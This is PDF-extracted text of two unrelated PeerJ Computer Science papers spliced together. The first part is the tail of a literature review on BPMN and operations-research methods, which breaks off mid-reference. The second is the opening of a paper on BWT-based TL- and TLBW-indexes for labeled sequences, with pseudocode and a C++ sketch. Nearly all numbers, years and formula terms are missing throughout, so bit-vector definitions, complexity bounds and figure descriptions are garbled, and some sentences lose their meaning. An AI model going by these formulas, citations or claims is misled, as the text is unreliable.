a dynamic task assignment approach based on queuing theory, individual worklist model, and stochastic theory. evolutionary and genetic algorithms the evolutionary algorithm was applied in the following publications: � herbert & sharp ( b): optimisation of bpmn business models via model checking; � herbert et al. ( ): evolutionary optimization of production materials workflow processes; � herbert, hansen & jacobsen ( ): using quantitative stochastic model checking tool to increase safety and improve efficiency in production processes; � herbert & hansen ( ): restructuring of workflows to minimise errors via stochastic model checking: an automated evolutionary approach; to optimize the bp diagram, thus looking for a more efficient process. 
especially the publication: specifying business process outsourcing requirements, rekik, boukadi & ben-abdallah ( ), presented a genetic algorithm to identify most appropriate activities of a business process that should be outsourced. queuing theory in the article: comparative analysis of business process litigation using queue theory and simulation (case study: religious courts of south jakarta) bahaweres, fitriyah & rozy ( ), onggo et al. ( ). a bpmn extension to support discrete-event simulation for healthcare applications: an explicit representation of queues, attributes and data-driven decision points onggo et al. ( ) and gómez-martnez et al. ( ). formal support of process chain networks using model-driven engineering and petri nets gómez- martnez et al. ( ), the authors use queuing theory and simulation to compare processes modeled in bpmn. in the article: automated performance analysis of business processes bocciarelli & d’ambrogio ( ), authors presented a bp performance model of eqn (extended queueing network) type. social network the publications below focus on the application of social network analysis metrics (sna) to studies of biological interaction networks in informatics. � khlif & ben-abdallah ( ): semantic and structural performer clustering in bpmn models transformed into social network models; � khlif, ben-abdallah & ben ayed ( ): a methodology for the semantic and structural restructuring of bpmn models. other approaches the following publications were unique in their approaches. we can mention for example: workflow fault tree generation through model checking by herbert & sharp ( a) with tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ fmea analysis. an effort prediction model based on bpm measures for process by aysolmaz, iren & demirors ( ) with linear multiple regression analysis. performance evaluation of business processes through a formal transformation to san by braghetto, ferreira & vincent ( ) using stochastic automata network. estimating performance of a business process model by kamrani et al. ( ) using a task assignment approach. formal verification of business processes as timed automata by mendoza morales, monsalve & villavicencio ( ) convert bpmn to timed automata and then perform standard queuing analysis. business models enhancement through discovery of roles by burattin, sperduti & veluscek ( ), there the authors have extended the process model to roles, specifically designed role-sharing algorithm. stochastic analysis of bpmn with time in rewriting logic by duran, rocha & salaun ( ) presents a rewriting logic executable specification of bpmn with time and extended with probabilities. sbat: a stochastic bpmn analysis tool by herbert, hansen & jacobsen ( ) presents sbat, a tool framework for the modelling and analysis of complex business workflows and a framework for model integration and holistic modelling of socio-technical systems by wu et al. ( ) presents a layered framework for the purposes of integrating different socio-technical systems (sts) models and perspectives into a whole-of-systems model. discussion we have identified several gaps in the research and issues that need to be addressed in future research. the main gaps concern the research area of business economics. we assumed that this area would be the main and most frequent for the combination of bpmn and or methods. however, we found that this area could be affected by the absence of specific notation. 
the relevant publications were written only after the release of version dmn . . the effect of dmn notation will be addressed in future research. an unexpected gap was a solution to finance and human resources management through or. we would like to introduce publications savku & weber ( ) and graczyk- kucharska et al. ( ) as the pioneering works. the first article added the problem of optimal consumption problem from cash flow with delay and regimes. the authors developed the general analytic model setting and methods for the solution by studying a stochastic optimal control problem using the tools of the maximum principle. they proved the necessary and sufficient maximum principles for a delayed jump-diffusion with regimes under full and partial information. the second publication focused on transversal competencies, which are sets of knowledge, skills and attitudes required for different positions and in different professions. the authors used the method of multivariate additive regression spline together with artificial neural networks to create a model describing the influence of various variables on the acceleration of the acquisition of transverse competencies. we assume that future research will be influenced by simulation and prediction methods. this study showed the use of agent-based modelling methods and discrete- event simulations, or probabilistic models and social networks, but neural networks or artificial intelligence methods appeared in any publication. based on this study, we further expect the use of more sophisticated approaches and the effect of new techniques. tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ at the same time, it is possible to extend process modelling to inaccurate data using fuzzy methods. conclusion this paper presented a systematic overview of publications using bpmn and or methods in process analysis. we analyzed articles, that were selected using the appropriate strings in the advanced search option of in the wos database. the papers that met the conditions of the study were subjected to various analyzes and were briefly described. the review showed that the processes modelled by bpmn can be extended or analyzed as probabilistic processes, queue theory, or role and task assignments. alternatively, processes can be optimized using evolutionary or genetic algorithms. the research also highlighted the need to identify keywords in publications correctly. for example, less than two-thirds of the selected articles contained the keyword bpmn, even though all the documents used this notation. most of the articles were so-called one-off publications. only a small number of author teams developed their topic in further continuing publications. due to this, the average number of citations is relatively low. due to the average number of citations to the total number of publications in all research areas, documents falling into the field of operational research are outstanding; there is an average of seven citations per article. we analyzed the publications by research area and found that there is great potential for the research area of business economics (be). only a few papers were associated with this area (five in total) but all of them had a higher than average number of citations. the first document we included in this research area was published in , that is only in the last quarter of the examined publication years. 
this focus on be may have been initiated by the introduction of dmn notation. among the authors, smaller collaborating groups around the world were been identified. that groups co-work within the framework of co-authorship and co-citations. we only identified one single-author publication. the analysis of keywords showed a significant difference between the keywords assigned by the authors and the so-called keywords plus keywords. while the former were almost completely connected across publications, the latter were significantly diversified. we have pointed out that the introduction of bpmn . led to an increase in publications using this notation. acknowledgements the authors thank the student m. kopecký for support in the field of bpmn modeling. additional information and declarations funding the research has been supported by a gacr - s and by the faculty of informatics and management uhk specific research project. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ grant disclosures the following grant information was disclosed by the authors: gacr - s. faculty of informatics and management uhk specific research project. competing interests the author declares that they have no competing interests. author contributions � hana tomaskova conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � gerhard-wilhelm weber analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: this article does not contain data or code because it is a literature review. references agatz n, erera a, savelsbergh m, wang x. . optimization for dynamic ride-sharing: a review. european journal of operational research ( ): – doi . /j.ejor. . . . aguilar-saven rs. . business process modelling: review and framework. international journal of production economics ( ): – doi . /s - ( ) - . aysolmaz b, iren d, demirors o. . an effort prediction model based on bpm measures for process automation. in: nurcan s, proper h, soffer p, krogstie j, schmidt r, halpin t, bider i, eds. enterprise, business-process and information systems modeling, bpmds . volume of lecture notes in business information processing. th international conference on business process modeling, development, and support (bpmds) / th international conference on exploring modeling methods for systems analysis and design (emmsad), caise, valencia, spain, june – , , – . bacovsky m, gavalec m, tomaskova h. . inverse fuzzy eigenproblem in databases. in: vojackova h, ed. mathematical methods in economics , pts i and ii. st international conference on mathematical methods in economics, jihlava, czech republic, sep – , , – . bahaweres rb, fitriyah a, rozy nf. . comparative analysis of business process litigation using queue theory and simulation (case study: religious courts of south jakarta). in: th international conference on cyber and it service management (citsm ), august – , , denpasar, indonesia. – . batoulis k, weske m. . soundness of decision-aware business processes. in: carmona j, engels g, kumar a, eds. 
business process management forum, lecture notes in business information processing, vol. , – , signavio; celonis; ibm; diputacio tarragona; bizagi; ca technologies; dcr; myinvenio. th international conference on business process management (bpm), barcelona, spain, september – , . tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.ejor. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ birge jr, louveaux f. . introduction to stochastic programming. berlin: springer science & business media. bocciarelli p, d’ambrogio a. . automated performance analysis of business processes. in: wainer g, mosterman p, dambrogio a, zacharewicz g, eds. theory of modeling and simulation - devs integrative m&s symposium (devs ), volume of simulation series. – , soc modeling & simulat. theory of modeling and simulation - devs integrative m&s symposium (devs ), orlando, fl, march – , . braghetto kr, ferreira je, vincent j-m. . performance evaluation of business processes through a formal transformation to san. in: thomas n, ed. computer performance engineering, volume of lecture notes in computer science. + th european performance engineering workshop, epew , borrowdale, united kingdom, october – , . burattin a, sperduti a, veluscek m. . business models enhancement through discovery of roles. in: ieee symposium on computational intelligence and data mining (cidm). – , ieee; ieee computat intelligence soc. ieee symposium on computational intelligence and data mining (cidm), april – , . piscataway: ieee. ceballos hg, flores-solorio v, garcia-vazquez jp. . towards probabilistic decision making on human activities modeled with business process diagrams. in: proceedings of the international conference on autonomous agents & multiagent systems (aamas’ ), – , assoc comp machinery; ifaamas; nsf; artificial intelligence; acm sigai; argela; microsoft res; fundamentals collect adapt sysgt; japan soc software sci & technol; teknoparkistanbul; acm in cooperat. th international conference on autonomous agents and multiagent systems (aamas), istanbul, turkey, may – , . ceballos hg, flores-solorio v, pablo garcia j. . a probabilistic bpmn normal form to model and advise human activities. in: baldoni m, baresi l, dastani m, eds. engineering multi-agent systems, emas , volume of lecture notes in artificial intelligence. – , rd international workshop on engineering multi-agent systems (emas), turkey, may , . certo s. . influencing initial public offering investors with prestige: signaling with board structures. academy of management review ( ): – doi . /amr. . . cheng y, zhao s, cheng b, chen x, chen j. . modeling and deploying iot-aware business process applications in sensor networks. sensors ( ): doi . /s . chinosi m, trombetta a. . bpmn: an introduction to the standard. computer standards & interfaces ( ): – doi . /j.csi. . . . cho sy, happa j, creese s. . capturing tacit knowledge in security operation centers. ieee access : – doi . /access. . . cimler r, cimr d, kuhnova j, tomaskova h. . novel effective algorithm for synchronization problem in directed graph. in: nguyen n, papadopoulos g, jedrzejowicz p, trawinski b, vossen g, eds. computational collective intelligence, iccci , pt i, volume of lecture notes in artificial intelligence. – , univ cyprus; wroclaw univ sci & technol. th international conference on computational collective intelligence (iccci), nicosia, cyprus, september – , . 
cimler r, tomaskova h, kuhnova j, dolezal o, pscheidl p, kuca k. . numeric, agent-based or system dynamics model? which modeling approach is the best for vast population simulation? current alzheimer research ( ): – doi . / . cimr d, cimler r, tomaskova h. . construction of an optimal timetable schedule in accordance with user preferences using the graph coloring algorithm. in: soliman k, ed. innovation management and education excellence through vision , vols i -xi. tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /amr. . http://dx.doi.org/ . /s http://dx.doi.org/ . /j.csi. . . http://dx.doi.org/ . /access. . http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ – , int business informat management assoc. st international-business- information-management-association conference, milan, italy, april – , . clarivate analytics. . keywords plus generation, creation, and changes. available at https://support.clarivate.com/scientificandacademicresearch/s/article/keywords-plus- generation-creation-and-changes?language=en_us (accessed july ). clarivate analytics. . web of science categories. available at https://images.webofknowledge. com/images/help/wos/hp_subject_category_terms_tasca.html (accessed july ). cobo mj, lópez-herrera ag, herrera-viedma e, herrera f. . science mapping software tools: review, analysis, and cooperative study among tools. journal of the american society for information science and technology ( ): – doi . /asi. . dani vs, freitas cmds, thom lh. . ten years of visualization of business process models: a systematic literature review computer standards & interfaces : . dantzig gb. . linear programming and extensions. vol. . princeton: princeton university press. de ramon fernandez a, ruiz fernandez d, sabuco garcia y. . business process management for optimizing clinical processes: a systematic literature review. health informatics journal ( ): – doi . / . de smedt j, hasic f, van den broucke sklm, vanthienen j. . holistic discovery of decision models from process execution data. knowledge-based systems : doi . /j.knosys. . . dedrick j, gurbaxani v, kraemer k. . information technology and economic performance: a critical review of the empirical evidence. acm computing surveys ( ): – doi . / . . dorfman r, samuelson pa, solow rm. . linear programming and economic analysis. chelmsford: courier corporation. dubey sk. . a review on relation between operation research and different field of sciences. international journal of advanced research in computer science ( ): – . duran f, rocha c, salaun g. . stochastic analysis of bpmn with time in rewriting logic. science of computer programming : – doi . /j.scico. . . . durán f, rocha c, salaün g. . a rewriting logic approach to resource allocation analysis in business process models. science of computer programming : doi . /j.scico. . . euler l. . lettres a une princesse d’allemagne. letters : – . figl k, mendling j, tokdemir g, vanthienen j. . what we know and what we do not know about dmn. enterprise modelling and information systems architectures : – . garcia r. . uses of agent-based modeling in innovation/new product development research. journal of product innovation management ( ): – doi . /j. - . . .x. gavalec m, mls k, tomaskova h. . optimization of the ordinal and cardinal consistency of a preference matrix in decision making. in: alonso j, bustince h, reformat m, eds. 
proceedings of the conference of the international fuzzy systems association and the european society for fuzzy logic and technology, volume of advances in intelligent systems research. – , int fuzzy syst assoc; european soc fuzzy log & technol. th world congress of the international-fuzzy-systems-association (ifsa)/ th conference of the european-society-for- fuzzy-logic-and-technology (eusflat), gijon, spain, june –july , . tomaskova and weber ( ), peerj comput. sci., doi . /peerj-cs. / https://support.clarivate.com/scientificandacademicresearch/s/article/keywords-plus-generation-creation-and-changes?language=en_us https://support.clarivate.com/scientificandacademicresearch/s/article/keywords-plus-generation-creation-and-changes?language=en_us https://images.webofknowledge.com/images/help/wos/hp_subject_category_terms_tasca.html https://images.webofknowledge.com/images/help/wos/hp_subject_category_terms_tasca.html http://dx.doi.org/ . /asi. http://dx.doi.org/ . / http://dx.doi.org/ . /j.knosys. . http://dx.doi.org/ . / . http://dx.doi.org/ . /j.scico. . . http://dx.doi.org/ . /j.scico. . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ gavalec m, plavka j, tomaskova h. . interval eigenproblem in max-min algebra. linear algebra and its applications : – doi . /j.laa. . . . gavalec m, tomaskova h. . eigenspace of a circulant max-min matrix. kybernetika ( , si): – international conference on mathematical methods in economy and industry, univ s bohemia, ceske budejovice, czech republic, june – , . ghlala r, aouina zk, ben said l. . mc-dmn: meeting mcdm with dmn involving multi- criteria decision-making in business process. in: gervasi o, murgante b, misra s, borruso g, torre cm, rocha amac, taniar d, apduhan bo, stankova e, cuzzocrea a, eds. computational science and its applications - iccsa , pt vi, volume of lecture notes in computer science. – , univ trieste; univ perugia; univ basilicata; monash univ; kyushu sangyo univ; univ minho. th international conference on computational science and its applications (iccsa), trieste, italy, july – , . glassey o. . a case study on process modelling—three questions and three techniques. decision support systems ( ): – doi . /j.dss. . . . graczyk-kucharska m, Özmen a, szafrański m, weber gw, golińśki m, spychaa m. . knowledge accelerator by transversal competences and multivariate adaptive regression splines. central european journal of operations research ( ): – . gu j, goetschalckx m, mcginnis lf. . research on warehouse design and performance evaluation: a comprehensive review. european journal of operational research ( ): – doi . /j.ejor. . . . gómez-martnez e, pérez-blanco f, de lara j, vara jm, marcos e. . formal support of process chain networks using model-driven engineering and petri nets. in: proceedings of the th acm/sigapp symposium on applied computing. – . hasic f, de smedt j, vanthienen j. . augmenting processes with decision intelligence: principles for integrated modelling. decision support systems : – doi . /j.dss. . . . herbert lt, hansen znl. . restructuring of workflows to minimise errors via stochastic model checking: an automated evolutionary approach. reliability engineering & system safety : – , th international association for probabilistic safety assessment and management (psam ) conference, honolulu, hi, june – , . herbert lt, hansen z, jacobsen p. . sbat: a stochastic bpmn analysis tool. 
indexing labeled sequences
tatiana rocher, mathieu giraud and mikaël salson, université de lille, cnrs, centrale lille, inria, umr cristal, lille, france
abstract background: labels are a way to add information to a text, such as functional annotations like genes on dna sequences. v(d)j recombinations are dna recombinations involving two or three short genes in lymphocytes. sequencing this short region ( bp or less) produces labeled sequences and brings insight into the lymphocyte repertoire for onco-hematology or immunology studies. methods: we present two indexes for a text with non-overlapping labels. they store the text in a burrows–wheeler transform (bwt) and a compressed label sequence in a wavelet tree. the label sequence is taken in the order of the text (tl-index) or in the order of the bwt (tlbw-index). both indexes need a space related to the entropy of the labeled text. results: these indexes allow efficient text–label queries to count and find labeled patterns. the tlbw-index has an overhead on simple label queries but is very efficient on combined pattern–label queries. we implemented the indexes in c++ and compared them against a baseline solution on pseudo-random as well as on v(d)j labeled texts. discussion: new indexes such as the ones we propose improve the way we index and query labeled texts, for instance lymphocyte repertoires for hematological and immunological studies. subjects bioinformatics, computational biology, algorithms and analysis of algorithms keywords data structures, text indexing, burrows–wheeler transform, wavelet tree, v(d)j recombination
introduction labels are a way to add information to a text, such as the semantics of words in an english sentence or functional annotations like genes on dna sequences. can we build an index that stores a labeled text like acgcc : : : ttga (of size ), which has the label l in positions – and the label l in positions – ? we consider here the case where the same label can be given to different (but similar) patterns and can occur several times in the text. we introduce two indexes which store a labeled text and answer position–label association queries. these indexes share some ideas with the rl-fmi (mäkinen & navarro, ), which uses a burrows–wheeler transform (bwt) and a wavelet tree (wt). using a somewhat similar organization, we index a labeled text. the following sections present the tl- and tlbw-indexes (text–label indexes) and their associated queries. the last section presents experimental results on simulated and real genomic data. let t = t t : : : tn - be a text of length n over an alphabet of size s. the text may be composed of several sequences, each sequence ending with the symbol $. let l = {l , l : : : ll - } be a set of labels. a labeled text (t, a) is here a text with non-overlapping labels: a letter should have at most one label. each position i of the text is labeled by exactly one label ai ∈ l ∪ { }, where the special label is put on every letter how to cite this article rocher et al. ( ), indexing labeled sequences. peerj comput. sci. :e doi . /peerj-cs. submitted september accepted february published march corresponding authors mathieu giraud, mathieu.giraud@univ-lille.fr; mikaël salson, mikael.salson@univ-lille.fr academic editor rahul shah additional information and declarations can be found on page doi . /peerj-cs. copyright rocher et al. distributed under creative commons cc-by .
mailto:mathieu.�giraud@�univ-lille.�fr mailto:mikael.�salson@�univ-lille.�fr https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ without label. a = a a : : : an - is the label string. figure shows the text which will be used all over this article. given a bit vector b = b[ ]b[ ] : : : b[n - ], where each b[i] is either or , we define as b[i, j] the vector b[i]b[i + ] : : : b[j]. let us call rank(b, i, b) the number of times the bit b ∈ { , } appears in the prefix b[ , i] and select (b, j, b) the position i of the jth appearance of the bit b in b. such a bit vector b can be stored in nh (b) + o(n) bits to support rank and select in o( ), where h (b) is the zeroth order entropy of b (raman, raman & rao, ). the bwt (burrows & wheeler, ) is a reversible algorithm which reorganizes the letters of a text. the transformed text, bwt(t), is the concatenation of the last letters of the lexicographically sorted rotations of the text. bwt(t) is easier to compress and can be stored using nhk(t) + o(n) bits, where hk is the kth order empirical entropy of the text t. the fm-index (ferragina & manzini, ) uses the bwt, a table c, where c[a] gives the number of letters lexicographically smaller than a, and a function occ(a, i) giving the number of occurrences of a in bwt(t)[ , i]. the fm-index allows to efficiently search a pattern using backward search. a wt (grossi, gupta & vitter, ) is a binary tree storing a text, where each symbol from the alphabet corresponds to a leaf. the root is a bit vector where every position corresponds to the element it has to index. any position marked (respectively ) corresponds to an element whose leaf is on the left (respectively right) descendant of the node. the process is repeated recursively until the leaves. for a text a of length a in an alphabet of size l, the construction of a balanced wt needs o a dlog l= ffiffiffiffiffiffiffiffiffiffi log a p e � � time (munro, nekrich & vitter, ) and requires nh (a) + o(a log l) bits when bit vectors are zero-order compressed (navarro & mäkinen, ). the usual full-text indexes such as the fm-index (ferragina & manzini, ) or the lz-index (kärkkäinen & ukkonen, ) do not index labeled texts. some recent researches allow bidimensional range queries: arroyuelo et al. ( ) represent an xml tree structure as a compressed bit vector and allow queries on structured patterns. we focus here on non-overlapping labels and look for ways to efficiently store such labels along with sequences as well as to query them. the basic idea is that consecutive labels in a are often the same: we will thus store compressed label sequences. materials and methods tl-index: indexing labels over a text given a labeled text (t, a), we define the tl-index as, using a fm-index built on a bwt u to index the text, a bit vector ba marking the positions in the text where the labels change, and a wt wa indexing a compressed label sequence (fig. a). a a c a g c $ a t c a a c $ a g c t t t $ l . l l l . l figure the text t = aacagc$atcaac$agcttt$, with three sequences, is labeled with the label string a = l . l . l . l l l l l l l . l . l . l l l . full-size doi: . /peerj-cs. /fig- rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bwt u. 
let u = u u : : : un - be the bwtof t = t t : : : tn - . as usually done, the fm-index samples every log + n values of a suffix array to retrieve the text positions of any occurrence (navarro & mäkinen, ). a′ l . l e l l . e l e wa q e q l q l q l . l . u c c t c $ a a c $ $ g a t a g a a t a t c t a a c a g c $ a t c a a c $ a g c t t t $ a l . l . l . l l l ε l l l l . l . l . e l l l e e e e ba a d′ l l . e l e l . l . e l l . l l . l e l e l wd q ε q l q l q l . l . u d bd c l c l . t e c l $ e a l . a l . c l . $ e $ e g l a l . t l a l . g l a l a l t e a l t e c l b figure tl- and tlbw-indexes store a text of length with four unique labels. (a) tl-index. the wt wa has four internal nodes and five leaves. we have ba[ ] = because a = a = l , and ba[ ] = because a s a . the label a = l is thus stored in a′, at position , hence w〈 〉= a′ = l . a′ has two occurrences of the label l : w - 〈l 〉= { , }, corresponding to the six positions { , , , , , } in a. (b) tlbw-index. the root of the wt d′ is now built in the order of the bwt u. the wt wd has four internal nodes and five leaves. the label d = l . is stored in d′, at position , hence w〈 〉= d′ = l . . d′ has two occurrences of the label l . : w - 〈l . 〉= { , }, corresponding to the three positions { , , } in u. in both cases, the label sequences (a, d) and the compressed label sequences (a′, d′) are not stored in the indexes. full-size doi: . /peerj-cs. /fig- rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bit vector ba. let ba a compressed bit vector of length n such that ba[ ] = , and, for i � , ba[i] = if ai = ai - , and otherwise ba[i] = . wavelet tree wa. let a′ =〈ai j ba[i] = 〉. a′ = a′ a′ : : : a′ a - is called the compressed label sequence. it is a subsequence of a, of length a, containing only the changing labels according to the positions in a. the compressed label sequence a′ is stored using a wt wa. wa is defined as (q, q ), where q is the set of nodes of wa and q ∈ q is the root node. each node q ∈ q is q = (q.val, q.label, q.left, q.right, q.parent), where q.label ∈ l ∪ { } is the label of q and q.parent is the parent node of q (q .parent being the null value ⊥). both q.left and q.right are child nodes in q ∪ {⊥}. a leaf is a node q where q.right and q.left are ⊥. each leaf q is linked to a label q.label ∈ l ∪ { }. the l + leaves are exactly the labels of l ∪ { } and we define leaf (q.label) = q. on a leaf q, we have q.val = ⊥. let q be a non-leaf node: we have q.label = q.val is the bit vector rooted at q in the wt. we explain in “shaping the wt for a label hierarchy” how wa can be further shaped depending on a label hierarchy. wa is part of the index. this wt is used to answer efficiently bidimensional range queries where the labels and the label positions are the two dimensions (mäkinen & navarro, ). a balanced wt has a height of log l, with l, the number of leaves. the accessor w〈i〉returns a′i, in o(log l) time. this is a classical query within a wt. given a label lx ∈ l, the function selectw〈lx, i〉gives the position of the ith lx label in a′ in o(log l) time. the accessor w - 〈lx〉gives the list of positions in a′ where a′i = lx. it runs in o(log l � occ) time, with occ the number of occurrences of lx in a′. tlbw-index: indexing labels in the order of the bwt the bwt tends to store text repetitions consecutively. 
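before turning to the tlbw-index, the tl-index label side just described can be made concrete with a short sketch in standard c++ (the implementation language used later in the paper). the labeling below is invented for illustration, not the exact labeling of fig. 1; the rank query is a naive linear scan and a′ is kept as a plain array, whereas the index stores ba as a compressed bit vector with constant-time rank and a′ in a wavelet tree.

// minimal sketch of the tl-index label components (standard c++ only, no sdsl-lite).
// the labels are hypothetical; "e" stands for the empty label epsilon.
#include <iostream>
#include <string>
#include <vector>

int main() {
    std::string t = "aacagc$atcaac$agcttt$";        // running example text, three sequences
    std::vector<std::string> a = {                   // label string a, one label per letter
        "l1", "l1", "l1", "l2.1", "l2.1", "l2.1", "e",
        "l3", "l3", "l3", "l1", "l1", "l1", "e",
        "l1", "l1", "l1", "l4", "l4", "l4", "e"};

    std::vector<bool> ba(t.size());                  // ba[i] = 1 iff the label changes at position i
    std::vector<std::string> a_prime;                // a' = compressed label sequence
    for (std::size_t i = 0; i < a.size(); ++i) {
        ba[i] = (i == 0) || (a[i] != a[i - 1]);
        if (ba[i]) a_prime.push_back(a[i]);
    }

    // label(i) = a'[rank1(ba, i + 1) - 1]; rank is a linear scan here,
    // whereas the index answers it in constant time on a compressed bit vector.
    auto label = [&](std::size_t i) {
        std::size_t rank = 0;
        for (std::size_t k = 0; k <= i; ++k) rank += ba[k];
        return a_prime[rank - 1];
    };

    std::cout << "|a'| = " << a_prime.size() << "\n";
    for (std::size_t i : {0u, 4u, 10u, 17u})
        std::cout << "label(" << i << ") = " << label(i) << "\n";
}

on this toy labeling, a has 21 entries but a′ only 9, which is the compression both indexes rely on when consecutive labels repeat.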
as those repetitions may have the same labels, it would be interesting that the labels benefit from the bwt reordering. hence, labels can also be stored in the order of u. given a labeled text (t, a), the tlbw-index is defined as (u, bd, wd) (fig. b). the bwt u is built in the same way as the tl-index. let d = d d : : : dn - the labels in the order of u. the bit vector bd of size n is such that bd[ ] = , and, for i � , bd[i] = if di = di - , and otherwise bd[i] = . let d′ =〈di j bd[i] = 〉. d′ = d′ , d′ : : : d′d - is a compressed label sequence of length d, subsequence of d. the wt wd now indexes the compressed label sequence d′. the tlbw-index will be slower to build than the tl-index as it needs d. on the other side, as it is aware of the order of letters in the bwt, it will be able to support faster text/label queries. queries the indexes allow the following classical queries. � label(ti) (also called access(ai))—which label is on the letter ti? this query is done is o(log l) time in the tl-index, and in o(log + n + log l) time in the tlbw-index since it has to convert positions in u order (see fig. ). � findp(p) p—which are the occurrences of a pattern p ? it is solved with the fm-index alone (ferragina & manzini, ). this query runs in o(jpj + occ � log + n) time in both indexes, where occ is the number of occurrences of p in t. rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � findl(lx)—which text positions are labeled lx? the query runs in o(y � log l) time in the tl-index, and in o(y(log l + log + n)) time in the tlbw-index, where y = w - 〈lx〉and y = jyj. see fig. . the three previous queries are well known in text indexes. the two next queries search for a pattern and a label at the same time. � countpl(p, lx)—how many text positions are labeled lx and begin an occurrence of a pattern p ? as in the findl(lx) query, the occurrences of p are found in u, in the positions from i to j. tl-index: we translate all these occ occurrences to have the corresponding positions in the text. for each of them, we run the query label(ti). the total time is o(jpj + occ (log n + + log l)). tlbw-index: see algorithm . i and j correspond to the positions i′ = rank( , i, bd) and j′ = rank( , j, bd) in the root q of wd. we then use an accessor customized from the rangelocate function of (mäkinen & navarro, ), simulating a two-dimensional range query on [lx, lx] � [i′, j′] in wd to give the set of positions z = {z j a′z = lx and i′ � z � j′ } in o(jzj � log l) time. this accessor first traverses the wt from the root to the leaf lx and then traverses it back to the root to find the positions in q .val which match the label in the given range. for every position found, we find the corresponding positions in bd and expand them to the following -bits in bd. this query runs in o(jpj + jzj � log l) time. � findpl(p, lx)—which text positions are labeled lx and begin an occurrence of a pattern p? tl-index: this query is exactly the same as countpl(p, lx). wd q e q l q l q l . l . u bd c c t c $ a a c $ $ g a t a g a a t a t c figure finding the label of a letter in a tlbw-index. the letter u corresponds to a -bit in bd. the previous -bit in bd is the bit at position . it’s the th -bit of bd, it corresponds to the bit at position in wd’s root, which label is w〈 〉= l . . full-size doi: . /peerj-cs. /fig- rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ tlbw-index: we use the countpl(p, lx) query detailed in algorithm , replacing the counter cnt with a list y holding the matching positions in u. the positions are converted at the end in the text order. this query runs in o(jpj + jzj � log l + y � log + n) time, with jyj = y. algorithm countpl(p, lx): count the positions starting a pattern p and labeled with lx (i,j) from findp(p) ▹ starting and ending positions of occurrences of p in u i′ = rank( , i, bd) j′ = rank( , j, bd) c = path(lx) ▹ bit vector representing the path from the root to leaf(lx) node = q for p in to jcj - do ▹ loop corresponding to rangelocate in (mäkinen & navarro, ) i′ = rank(c[p], i′ - , node.val) j′ = rank(c[p], j′, node.val) - node = (c[p] == )? node.left : node.right if i′ > j ′ then return cnt = for k in i′ to j′ do k′ = selectw〈lx, rank(c[jcj - ], k, node.val)〉 ▹ ith lx label in a′ i″ = select( , k′, bd) j″ = select( , k′ + , bd) cnt = cnt + j″ - i″ ▹ positions [i″, j″ - ] in u taken into account return cnt wd q e q l q l q l . l . u bd c c t c $ a a c $ $ g a t a g a a t a t c figure finding the letters which have a l . label in a tlbw-index. y = w - 〈l . 〉= { , }. for every bit of y, we access to the -bit corresponding in bd ({ , }), and all the -bits which follow it ({ }). the corresponding letters of u are labeled l . , at positions { , , }. full-size doi: . /peerj-cs. /fig- rocher et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ as jzj � y � occ, the countpl() and the findpl() queries may thus be faster on the tlbw-index, jzj depending of the compression bd can do on y. note that the countpl(p, lx) query could be faster if the wt was directly built on the labels, without the intermediate bit vector bd (ba): the answer would be known while reaching the leaf of the wt in o(jpj + log l) time. we chose to favor the execution time of the findpl(p, lx) query, as well as the size of the structure (when a can be compressed). the findpl(p, lx) can vary to find the patterns p which have the label lx on the ith position of the pattern, or in any pattern’s position. adapting this queries is easy in the tl-index as we find the positions of the pattern in the bwt, translate them in the text order and then find the label of the ith position following each of them. in the tlbw-index, we find the patterns’ positions in the bwt, access to the ith letter (we need to sample the bwt to read the patterns in the forward way), and find the label as usual. to have the label in any pattern’s position, in the tl-index we need to find a label lx between the first and last letter of the pattern (with only two access in the wt) but in the tlbw-index, we look for the label of all the pattern’s letters. construction and space we recall that the text (t, a) is of length n and is labeled with l unique labels. as defined above, the indexes store u in nhk(t) + o(n) bits. the tl-index stores the bit vector with rank and select capabilities in nh (ba) + o(n) bits. the size of wa depends on the compressed label sequence a′, of length a. wa takes a h (a′) + o(a log l) bits. similarly, the tlbw-index stores bd in nh (bd) + o(n) bits and wd takes d h (d′) + o(d log l) bits, where d is the length of d′. the bwt can be built in linear time while using little space (belazzougui et al., ; munro, navarro & nekrich, ). ba is built while reading a in o(n) time. 
